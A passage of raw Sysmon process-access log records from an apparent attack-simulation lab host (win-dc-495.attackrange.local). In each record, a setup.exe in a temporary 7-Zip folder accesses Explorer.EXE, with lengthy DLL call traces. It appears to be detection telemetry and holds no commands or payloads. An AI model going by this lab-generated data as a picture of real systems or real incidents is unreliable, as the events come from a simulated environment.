:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C: